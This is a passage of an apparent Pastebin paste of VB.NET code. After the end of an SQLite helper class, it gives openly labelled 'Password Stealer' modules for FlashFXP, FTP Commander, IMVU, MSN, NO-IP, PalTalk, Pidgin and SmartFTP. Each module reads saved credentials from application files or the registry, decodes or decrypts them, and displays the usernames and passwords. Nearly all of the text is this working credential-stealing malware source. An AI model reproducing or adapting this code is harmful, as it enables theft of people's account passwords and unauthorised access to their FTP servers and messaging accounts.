  647.                 Dim columnValues As Object() = New Object(columnCount - 1) {}
  648.                 For i As Integer = 0 To columnCount - 1
  649.                     columnName = PointerToString(sqlite3_column_name(statement, i))
  650.                     columnType = sqlite3_column_type(statement, i)
  651.                     Select Case columnType
  652.                         Case CInt(SQLiteDataTypes.INT)
  653.                             If True Then
  654.                                 table.Columns.Add(columnName, Type.[GetType]("System.Int32"))
  655.                                 columnValues(i) = sqlite3_column_int(statement, i)
  656.                                 Exit Select
  657.                             End If
  658.                         Case CInt(SQLiteDataTypes.FLOAT)
  659.                             If True Then
  660.                                 table.Columns.Add(columnName, Type.[GetType]("System.Single"))
  661.                                 columnValues(i) = sqlite3_column_double(statement, i)
  662.                                 Exit Select
  663.                             End If
  664.                         Case CInt(SQLiteDataTypes.TEXT)
  665.                             If True Then
  666.                                 table.Columns.Add(columnName, Type.[GetType]("System.String"))
  667.                                 columnValues(i) = PointerToString(sqlite3_column_text(statement, i))
  668.                                 Exit Select
  669.                             End If
  670.                         Case CInt(SQLiteDataTypes.BLOB)
  671.                             If True Then
  672.                                 table.Columns.Add(columnName, Type.[GetType]("System.String"))
  673.                                 columnValues(i) = PointerToString(sqlite3_column_blob(statement, i))
  674.                                 Exit Select
  675.                             End If
  676.                         Case Else
  677.                             If True Then
  678.                                 table.Columns.Add(columnName, Type.[GetType]("System.String"))
  679.                                 columnValues(i) = ""
  680.                                 Exit Select
  681.                             End If
  682.                     End Select
  683.                 Next
  684.                 table.Rows.Add(columnValues)
  685.             End If
  686.             Return sqlite3_step(statement)
  687.         End Function
  688.         Private Function ReadNextRow(ByVal statement As IntPtr, ByRef table As DataTable) As Integer
  689.             Dim columnCount As Integer = sqlite3_column_count(statement)
  690.  
  691.             Dim columnType As Integer = 0
  692.             Dim columnValues As Object() = New Object(columnCount - 1) {}
  693.  
  694.             For i As Integer = 0 To columnCount - 1
  695.                 columnType = sqlite3_column_type(statement, i)
  696.  
  697.                 Select Case columnType
  698.                     Case CInt(SQLiteDataTypes.INT)
  699.                         If True Then
  700.                             columnValues(i) = sqlite3_column_int(statement, i)
  701.                             Exit Select
  702.                         End If
  703.                     Case CInt(SQLiteDataTypes.FLOAT)
  704.                         If True Then
  705.                             columnValues(i) = sqlite3_column_double(statement, i)
  706.                             Exit Select
  707.                         End If
  708.                     Case CInt(SQLiteDataTypes.TEXT)
  709.                         If True Then
  710.                             columnValues(i) = PointerToString(sqlite3_column_text(statement, i))
  711.                             Exit Select
  712.                         End If
  713.                     Case CInt(SQLiteDataTypes.BLOB)
  714.                         If True Then
  715.                             columnValues(i) = PointerToString(sqlite3_column_blob(statement, i))
  716.                             Exit Select
  717.                         End If
  718.                     Case Else
  719.                         If True Then
  720.                             columnValues(i) = ""
  721.                             Exit Select
  722.                         End If
  723.                 End Select
  724.             Next
  725.             table.Rows.Add(columnValues)
  726.             Return sqlite3_step(statement)
  727.         End Function
  728.         Private Function StringToPointer(ByVal str As [String]) As IntPtr
  729.             If str Is Nothing Then
  730.                 Return IntPtr.Zero
  731.             Else
  732.                 Dim encoding__1 As Encoding = Encoding.UTF8
  733.                 Dim bytes As [Byte]() = encoding__1.GetBytes(str)
  734.                 Dim length As UInteger = bytes.Length + 1
  735.                 Dim pointer As IntPtr = HeapAlloc(GetProcessHeap(), 0, DirectCast(length, UInt32))
  736.                 Marshal.Copy(bytes, 0, pointer, bytes.Length)
  737.                 Marshal.WriteByte(pointer, bytes.Length, 0)
  738.                 Return pointer
  739.             End If
  740.         End Function
  741.         Private Function PointerToString(ByVal ptr As IntPtr) As [String]
  742.             If ptr = IntPtr.Zero Then
  743.                 Return Nothing
  744.             End If
  745.  
  746.             Dim encoding__1 As Encoding = Encoding.UTF8
  747.  
  748.             Dim length As Integer = GetPointerLenght(ptr)
  749.             Dim bytes As [Byte]() = New [Byte](length - 1) {}
  750.             Marshal.Copy(ptr, bytes, 0, length)
  751.             Return encoding__1.GetString(bytes, 0, length)
  752.         End Function
  753.         Private Function GetPointerLenght(ByVal ptr As IntPtr) As Integer
  754.             If ptr = IntPtr.Zero Then
  755.                 Return 0
  756.             End If
  757.             Return lstrlen(ptr)
  758.         End Function
  759.     End Class
  760. End Namespace
  761.  
  762.  
  763. 'FlashFXP Stealer function
  764.  
  765.  
  766. Module FlashFXP
  767.     Function FlashFXP() As String
  768.         Dim sPath As String = Replace(Environ$("APPDATA"), Environ$("Username"), "All Users") & "\FlashFXP\" & "3" & "\quick.dat"
  769.         Dim sFile As String = ReadFile(sPath)
  770.         Dim sHost As String = Cut(sFile, "IP=", vbNewLine)
  771.         Dim sPort As String = Cut(sFile, "port=", vbNewLine)
  772.         Dim sUser As String = Cut(sFile, "user=", vbNewLine)
  773.         Dim sPwd As String = Cut(sFile, "pass=", vbNewLine)
  774.         Dim sEntry As String = Cut(sFile, "created=", vbNewLine)
  775.  
  776.         If Not sUser = "" Then
  777.             Try
  778.                 FlashFXP = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Pwd: " + sPwd + " (Encrypt)"
  779.                 Dim nl As String = vbNewLine
  780.                 Form1.ztext.AppendText(nl)
  781.                 Form1.ztext.AppendText("============FlashFXP==============")
  782.                 Form1.ztext.AppendText(nl)
  783.                 Form1.ztext.AppendText("Entry: " & sEntry)
  784.                 Form1.ztext.AppendText(nl)
  785.                 Form1.ztext.AppendText("Host: " & sHost)
  786.                 Form1.ztext.AppendText(": " & sPort)
  787.                 Form1.ztext.AppendText(nl)
  788.                 Form1.ztext.AppendText("User: " & sUser)
  789.                 Form1.ztext.AppendText(nl)
  790.                 Form1.ztext.AppendText("Password: " & sPwd)
  791.                 Form1.ztext.AppendText("=============================")
  792.                 Form1.ztext.AppendText(nl)
  793.             Catch ex As Exception
  794.                 Form1.ztext.AppendText("============FlashFXP==============")
  795.                 Form1.ztext.AppendText(vbNewLine)
  796.                 Form1.ztext.AppendText("FlashFXP Couldn't Be Recovered!")
  797.                 Form1.ztext.AppendText(vbNewLine)
  798.                 Form1.ztext.AppendText("=================================")
  799.             End Try
  800.         Else
  801.         End If
  802.     End Function
  803. End Module
  804. [/php]
  805.  
  806. [b]FTP Commande Password Stealerr[/b]
  807.  
  808. [php]
  809. Module FTPCommander
  810.     Function FtpCommander() As String
  811.         Dim sPath As String = Replace(RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander\UninstallString"), "uninstall.exe", vbNullString) & "Ftplist.txt"
  812.         Dim sFile As String = ReadLine(sPath, -1)
  813.         Dim sHost As String = Cut(sFile, ";Server=", ";Port=")
  814.         Dim sPort As String = Cut(sFile, ";Port=", ";Password=")
  815.         Dim sUser As String = Cut(sFile, ";User=", ";Anonymous=")
  816.         Dim sPwd As String = Cut(sFile, ";Password=", ";User=")
  817.         Dim sEntry As String = Cut(sFile, "Name=", ";Server=")
  818.  
  819.         If Not sUser = "" Then
  820.             Try
  821.                 FtpCommander = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Pwd: " + sPwd
  822.                 Dim nl As String = vbNewLine
  823.                 Form1.ztext.AppendText(nl)
  824.                 Form1.ztext.AppendText("============FTP Commander==============")
  825.                 Form1.ztext.AppendText(nl)
  826.                 Form1.ztext.AppendText("Entry: " & sEntry)
  827.                 Form1.ztext.AppendText(nl)
  828.                 Form1.ztext.AppendText("Host: " & sHost)
  829.                 Form1.ztext.AppendText(": " & sPort)
  830.                 Form1.ztext.AppendText(nl)
  831.                 Form1.ztext.AppendText("User: " & sUser)
  832.                 Form1.ztext.AppendText(nl)
  833.                 Form1.ztext.AppendText("Password: " & sPwd)
  834.                 Form1.ztext.AppendText("=============================")
  835.                 Form1.ztext.AppendText(nl)
  836.             Catch ex As Exception
  837.             End Try
  838.         Else
  839.         End If
  840.     End Function
  841. End Module
  842. [/php]
  843.  
  844. [b]IMVU Password Stealer[/b]
  845.  
  846. [php]
  847. Module Imvu
  848.     Function ReadKey(ByRef hKey As String) As Object ' // Function for Read REG Values
  849.         On Error GoTo Error_Renamed ' // If Error dont Display Error
  850.         Dim X As Object ' //
  851.         X = CreateObject("WScript.shell") ' // Create REG Object
  852.         ReadKey = X.regread(hKey) ' // Read The Key
  853.         Exit Function
  854. Error_Renamed: ReadKey = vbNullString ' // If Error Readkey = ""
  855.     End Function
  856.     Public Function Hex2Ascii(ByVal Text As String) As String
  857.         Dim Value As Object
  858.         Dim num As Object
  859.         Dim i As Object ' // Simple Function for Pass Hex to Ascii
  860.         Value = Nothing
  861.         For i = 1 To Len(Text) ' Len of Encripted Text
  862.             num = Mid(Text, i, 2) ' // Go Chr by Chr
  863.             Value = Value & Chr(Val("&h" & num)) ' // Pass from Hex
  864.             i = i + 1 ' // +1
  865.         Next i ' Next Chr
  866.  
  867.         Hex2Ascii = Value ' //
  868.     End Function
  869.     Public Function DoToVu() As String
  870.         Dim sUser, sPass As String ' // Some Variables
  871.         sUser = "HKEY_CURRENT_USER\Software\IMVU\username\" ' // Username REG Path
  872.         sPass = "HKEY_CURRENT_USER\Software\IMVU\password\" ' // Password REG Path
  873.         Dim nl As String = vbNewLine
  874.         Form1.ztext.AppendText(nl)
  875.         Form1.ztext.AppendText("============IMVU==============")
  876.         Form1.ztext.AppendText(nl)
  877.         Form1.ztext.AppendText("Username: " & ReadKey(sUser))
  878.         Form1.ztext.AppendText(nl)
  879.         Form1.ztext.AppendText("Password: " & Hex2Ascii(ReadKey(sPass)))
  880.         Form1.ztext.AppendText(nl)
  881.         Form1.ztext.AppendText("=============================")
  882.         Form1.ztext.AppendText(nl)
  883. Sex:
  884.         Exit Function
  885.     End Function
  886. End Module
  887.  
  888.  
  889. 'MSN Password Stealer
  890.  
  891. [php]
  892. Imports System.Collections.Generic
  893. Imports System.Text
  894. Imports System.Runtime.InteropServices
  895. Imports System.IO
  896.     Module MSN
  897.     <DllImport("advapi32.dll", SetLastError:=True, CharSet:=CharSet.Unicode)> _
  898.     Public Function CredEnumerateW(ByVal filter As String, ByVal flag As UInteger, ByVal count As UInteger, ByVal pCredentials As IntPtr) As Boolean
  899.     End Function
  900.     <DllImport("crypt32", CharSet:=CharSet.Auto, SetLastError:=True)> _
  901.     Friend Function CryptUnprotectData(ByRef dataIn As DATA_BLOB, ByVal ppszDataDescr As Integer, ByVal optionalEntropy As Integer, ByVal pvReserved As Integer, ByVal pPromptStruct As Integer, ByVal dwFlags As Integer, _
  902.      ByVal pDataOut As DATA_BLOB) As Boolean
  903.     End Function
  904.     Friend Structure CREDENTIAL
  905.         Public Flags As Integer
  906.         Public Type As Integer
  907.         <MarshalAs(UnmanagedType.LPWStr)> _
  908.         Public TargetName As String
  909.         <MarshalAs(UnmanagedType.LPWStr)> _
  910.         Public Comment As String
  911.         Public LastWritten As Long
  912.         Public CredentialBlobSize As Integer
  913.         Public CredentialBlob As Integer
  914.         Public Persist As Integer
  915.         Public AttributeCount As Integer
  916.         Public Attributes As IntPtr
  917.         <MarshalAs(UnmanagedType.LPWStr)> _
  918.         Public TargetAlias As String
  919.         <MarshalAs(UnmanagedType.LPWStr)> _
  920.         Public UserName As String
  921.     End Structure
  922.     Private Cred As CREDENTIAL
  923.     Friend Structure DATA_BLOB
  924.         Public cbData As Integer
  925.         Public pbData As Integer
  926.     End Structure
  927.     Friend Structure UserDetails
  928.         Public uName As String
  929.         Public uPass As String
  930.     End Structure
  931.     Public count As UInteger
  932.     Public pCredentials As IntPtr = IntPtr.Zero
  933.     Public dataIn As DATA_BLOB
  934.     Public dataOut As DATA_BLOB
  935.     Public uDetail As UserDetails
  936.     Public Function getPwd() As String()
  937.         Password()
  938.         Dim pass As String() = {uDetail.uName, uDetail.uPass}
  939.         Return pass
  940.  
  941.     End Function
  942.     Public Sub Password()
  943.         Try
  944.             Dim ptr As IntPtr = Marshal.ReadIntPtr(pCredentials, 0 * 4)
  945.             Cred = CType(Marshal.PtrToStructure(ptr, Cred.[GetType]()), CREDENTIAL)
  946.             dataIn.pbData = Cred.CredentialBlob
  947.             dataIn.cbData = Cred.CredentialBlobSize
  948.             CryptUnprotectData(dataIn, 0, 0, 0, 0, 1, _
  949.              dataOut)
  950.             dataOut.pbData = dataIn.pbData
  951.  
  952.             uDetail.uName = Cred.UserName
  953.             uDetail.uPass = (Marshal.PtrToStringUni(New IntPtr(dataOut.pbData)))
  954.             Dim nl As String = vbNewLine
  955.             Form1.ztext.AppendText(nl)
  956.             Form1.ztext.AppendText("============MSN==============")
  957.             Form1.ztext.AppendText(nl)
  958.             Form1.ztext.AppendText("Username: " & uDetail.uName)
  959.             Form1.ztext.AppendText(nl)
  960.             Form1.ztext.AppendText("Password: " & uDetail.uPass)
  961.             Form1.ztext.AppendText(nl)
  962.             Exit Sub
  963.         Catch x As Exception
  964.             Dim nl As String = vbNewLine
  965.             Form1.ztext.AppendText(nl)
  966.             Form1.ztext.AppendText("============MSN==============")
  967.             Form1.ztext.AppendText(nl)
  968.             Form1.ztext.AppendText("MSN Could not be recovered!")
  969.             Form1.ztext.AppendText(nl)
  970.             Exit Sub
  971.         End Try
  972.     End Sub
  973. End Module
  974.  
  975.  
  976. 'NO-IP Password Stealer
  977.  
  978.  
  979. Module No_IP
  980.     Public Function base64Decode(ByVal data As String) As String
  981.         Try
  982.             Dim encoder As New System.Text.UTF8Encoding()
  983.             Dim utf8Decode As System.Text.Decoder = encoder.GetDecoder()
  984.             Dim todecode_byte As Byte() = Convert.FromBase64String(Data)
  985.             Dim charCount As Integer = utf8Decode.GetCharCount(todecode_byte, 0, todecode_byte.Length)
  986.             Dim decoded_char As Char() = New Char(charCount - 1) {}
  987.             utf8Decode.GetChars(todecode_byte, 0, todecode_byte.Length, decoded_char, 0)
  988.             Dim result As String = New [String](decoded_char)
  989.             Return result
  990.         Catch e As Exception
  991.         End Try
  992.     End Function
  993.     Function IpRecord() As String
  994.         Try
  995.             IpRecord = Nothing
  996.             Dim Username As String = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC", "Username", Nothing)
  997.             Dim Password As String = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC", "Password", Nothing)
  998.             Dim nl As String = vbNewLine
  999.             Form1.ztext.AppendText(nl)
  1000.             Form1.ztext.AppendText("============IMVU==============")
  1001.             Form1.ztext.AppendText(nl)
  1002.             Form1.ztext.AppendText("Username: " & Username)
  1003.             Form1.ztext.AppendText(nl)
  1004.             Form1.ztext.AppendText("Password: " & base64Decode(Password))
  1005.             Form1.ztext.AppendText(nl)
  1006.             Form1.ztext.AppendText("=============================")
  1007.             Form1.ztext.AppendText(nl)
  1008.         Catch
  1009.             Dim nl As String = vbNewLine
  1010.             Form1.ztext.AppendText(nl)
  1011.             Form1.ztext.AppendText("============IMVU==============")
  1012.             Form1.ztext.AppendText(nl)
  1013.             Form1.ztext.AppendText("IMVU Not Installed!")
  1014.             Form1.ztext.AppendText(nl)
  1015.         End Try
  1016.     End Function
  1017. End Module
  1018.  
  1019.  
  1020. 'PalTalk Password Stealer
  1021.  
  1022.  
  1023. Module PalTalk
  1024.     Public Function GetHDSerial() As String
  1025.         Dim disk As New System.Management.ManagementObject( _
  1026.         "Win32_LogicalDisk.DeviceID=""C:""")
  1027.         Dim diskPropertyA As System.Management.PropertyData = _
  1028.           disk.Properties("VolumeSerialNumber")
  1029.         Return diskPropertyA.Value.ToString()
  1030.     End Function
  1031.     Public Function paltalkscene() As String
  1032.         Try
  1033.             Dim ser() As Char = GetHDSerial().ToCharArray
  1034.             Dim reg As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser
  1035.             Dim out As String = ""
  1036.             reg = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("Software\Paltalk")
  1037.             Dim users As String() = reg.GetSubKeyNames()
  1038.             reg.Close()
  1039.             For Each s As String In users
  1040.                 Dim t, o, i, x As Integer
  1041.                 Dim pass As String = Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\Software\Paltalk\" & s, "pwd", "")
  1042.                 Dim chr1 As Char() = pass.ToCharArray
  1043.                 Dim passarr(pass.Length / 4) As String
  1044.                 While t <= UBound(chr1) - 4
  1045.                     If t < UBound(chr1) - 4 Then
  1046.                         passarr(o) = chr1(t) & chr1(t + 1) & chr1(t + 2)
  1047.                     End If
  1048.                     t += 4
  1049.                     o += 1
  1050.                 End While
  1051.                 Dim key As String = ""
  1052.                 For Each c As Char In s
  1053.                     key += c
  1054.                     If i <= UBound(ser) Then
  1055.                         key += ser(i)
  1056.                     End If
  1057.                     i = i + 1
  1058.                 Next
  1059.                 key = key & key & key
  1060.                 Dim chr_arr As Char() = key.ToCharArray
  1061.                 Dim blainpass As String = ""
  1062.                 blainpass += Chr(passarr(0) - 122 - Asc(key.Substring(key.Length - 1, 1)))
  1063.                 For x = 1 To UBound(passarr)
  1064.                     Dim tempchr As Char
  1065.                     If passarr(x) Is Nothing Then
  1066.                     Else
  1067.                         tempchr = Chr(passarr(x) - x - Asc(chr_arr(x - 1)) - 122)
  1068.                         blainpass += tempchr
  1069.                     End If
  1070.                 Next x
  1071.  
  1072.                 Dim nl As String = vbNewLine
  1073.                 Form1.ztext.AppendText(nl)
  1074.                 Form1.ztext.AppendText("============PalTalk==============")
  1075.                 Form1.ztext.AppendText(nl)
  1076.                 Form1.ztext.AppendText("Username: " & s)
  1077.                 Form1.ztext.AppendText(nl)
  1078.                 Form1.ztext.AppendText("Password: " & blainpass)
  1079.                 Form1.ztext.AppendText(nl)
  1080.                 Form1.ztext.AppendText("=============================")
  1081.                 Form1.ztext.AppendText(nl)
  1082.             Next
  1083.             Return out
  1084.         Catch ex As Exception
  1085.             Dim nl As String = vbNewLine
  1086.             Form1.ztext.AppendText(nl)
  1087.             Form1.ztext.AppendText("============PalTalk==============")
  1088.             Form1.ztext.AppendText(nl)
  1089.             Form1.ztext.AppendText("PalTalk Not Installed!")
  1090.             Form1.ztext.AppendText(nl)
  1091.             Return "---"
  1092.         End Try
  1093.     End Function
  1094. End Module
  1095.  
  1096.  
  1097. 'Pidgin Password Stealer
  1098.  
  1099.  
  1100. Option Explicit On
  1101. Imports System.IO
  1102. Imports System.Xml
  1103. Module Pidgin
  1104.  
  1105.     Public Function GetPidgin() As String
  1106.         Dim ReadXML As New XmlDocument
  1107.         Dim i As Integer
  1108.         Dim OutAll = Nothing
  1109.         GetPidgin = ""
  1110.         Dim FilePath As String = Environ("appdata") & "\.purple\accounts.xml"
  1111.         If File.Exists(FilePath) <> True Then
  1112.             Exit Function
  1113.         Else
  1114.             Try
  1115.                 ReadXML.Load(FilePath)
  1116.                 Dim Protocol As XmlNodeList = ReadXML.GetElementsByTagName("protocol")
  1117.                 Dim Username As XmlNodeList = ReadXML.GetElementsByTagName("name")
  1118.                 Dim Password As XmlNodeList = ReadXML.GetElementsByTagName("password")
  1119.                 For i = 0 To Protocol.Count - 1
  1120.                     OutAll = OutAll & "Pidgin Stealer Logs!" & vbNewLine & "Protocol: " & Protocol(i).InnerText & vbCrLf _
  1121.                   & "Username: " & Username(i).InnerText & vbCrLf _
  1122.                     & "Password: " & Password(i).InnerText & vbCrLf & vbNewLine
  1123.                 Next
  1124.                 Dim nl As String = vbNewLine
  1125.                 Form1.ztext.AppendText(nl)
  1126.                 Form1.ztext.AppendText("============Pidgin==============")
  1127.                 Form1.ztext.AppendText(nl)
  1128.                 Form1.ztext.AppendText("Username: " & Username(i).InnerText)
  1129.                 Form1.ztext.AppendText(nl)
  1130.                 Form1.ztext.AppendText("Password: " & Password(i).InnerText)
  1131.                 Form1.ztext.AppendText(nl)
  1132.                 Form1.ztext.AppendText("=============================")
  1133.                 Form1.ztext.AppendText(nl)
  1134.             Catch ex As Exception
  1135.                 Dim nl As String = vbNewLine
  1136.                 Form1.ztext.AppendText(nl)
  1137.                 Form1.ztext.AppendText("============Pidgin==============")
  1138.                 Form1.ztext.AppendText(nl)
  1139.                 Form1.ztext.AppendText("Pidgin Not Installed!")
  1140.                 Form1.ztext.AppendText(nl)
  1141.                 Form1.ztext.AppendText("=============================")
  1142.                 Form1.ztext.AppendText(nl)
  1143.             End Try
  1144.         End If
  1145.     End Function
  1146. End Module
  1147.  
  1148.  
  1149. 'SmartFTP Password Stealer
  1150.  
  1151.  
  1152. Module SmartFTP
  1153.     Function SmartFTP() As String
  1154.         Dim sPath As String = Environ$("APPDATA") & "\SmartFTP\Client 2.0\Favorites\Quick Connect\" & Dir(Environ$("APPDATA") & "\SmartFTP\Client 2.0\Favorites\Quick Connect\*.xml")
  1155.         Dim sFile As String = ReadFile(sPath)
  1156.         Dim sHost As String = Cut(sFile, "<Host>", "</Host>")
  1157.         Dim sPort As String = Cut(sFile, "<Port>", "</Port>")
  1158.         Dim sUser As String = Cut(sFile, "<User>", "</User>")
  1159.         Dim sPwd As String = Cut(sFile, "<Password>", "</Password>")
  1160.         Dim sEntry As String = Cut(sFile, "<Name>", "</Name>")
  1161.  
  1162.         If Not sUser = "" Then
  1163.             Try
  1164.                 SmartFTP = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Password: " + sPwd + " (Encrypt)"
  1165.                 Dim nl As String = vbNewLine
  1166.                 Form1.ztext.AppendText(nl)
  1167.                 Form1.ztext.AppendText("============SmartFTP==============")
  1168.                 Form1.ztext.AppendText(nl)
  1169.                 Form1.ztext.AppendText("Entry: " & sEntry)
  1170.                 Form1.ztext.AppendText(nl)
  1171.                 Form1.ztext.AppendText("Host: " & sHost)
  1172.                 Form1.ztext.AppendText(": " & sPort)
  1173.                 Form1.ztext.AppendText(nl)
  1174.                 Form1.ztext.AppendText("User: " & sUser)
  1175.                 Form1.ztext.AppendText(nl)
  1176.                 Form1.ztext.AppendText("Password: " & sPwd)
  1177.                 Form1.ztext.AppendText("=============================")
  1178.                 Form1.ztext.AppendText(nl)
  1179.             Catch ex As Exception
  1180.                 Form1.ztext.AppendText("============SmartFTP==============")
  1181.                 Form1.ztext.AppendText(vbNewLine)
  1182.                 Form1.ztext.AppendText("SmartFTP Couldn't Be Recovered!")
  1183.                 Form1.ztext.AppendText(vbNewLine)
  1184.                 Form1.ztext.AppendText("=================================")
  1185.             End Try
  1186.         Else
  1187.         End If
  1188.     End Function
  1189.     Function ReadFile(ByVal sFile As String) As String
  1190.         On Error Resume Next
  1191.         Dim OpenFile As New System.IO.StreamReader(sFile)
  1192.         ReadFile = OpenFile.ReadToEnd.ToString
  1193.     End Function
  1194.     Function Cut(ByVal sInhalt As String, ByVal sText As String, ByVal stext2 As String) As String
  1195.         On Error Resume Next
  1196.         Dim c() As String
  1197.         Dim c2() As String
  1198.         c = Split(sInhalt, sText)
  1199.         c2 = Split(c(1), stext2)
  1200.         Cut = c2(0)
  1201.     End Function
  1202.     Function RegRead(ByVal hKey As String) As String
  1203.         Dim wshShell As Object = CreateObject("WScript.Shell")
  1204.         On Error Resume Next
  1205.         RegRead = wshShell.RegRead(hKey)
  1206.     End Function
  1207.     Public Function ReadLine(ByVal filename As String, _
  1208.     ByVal line As Integer) As String
  1209.         Try
  1210.             Dim lines As String() = My.Computer.FileSystem.ReadAllText( _
  1211.               filename, System.Text.Encoding.Default).Split(vbCrLf)
  1212.             If line > 0 Then
  1213.                 Return lines(line - 1)
  1214.             ElseIf line < 0 Then
  1215.                 Return lines(lines.Length + line - 1)
  1216.             Else
  1217.                 Return ""
  1218.             End If
  1219.         Catch ex As Exception
  1220.             Return ""
  1221.         End Try
  1222.     End Function
  1223. End Module
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!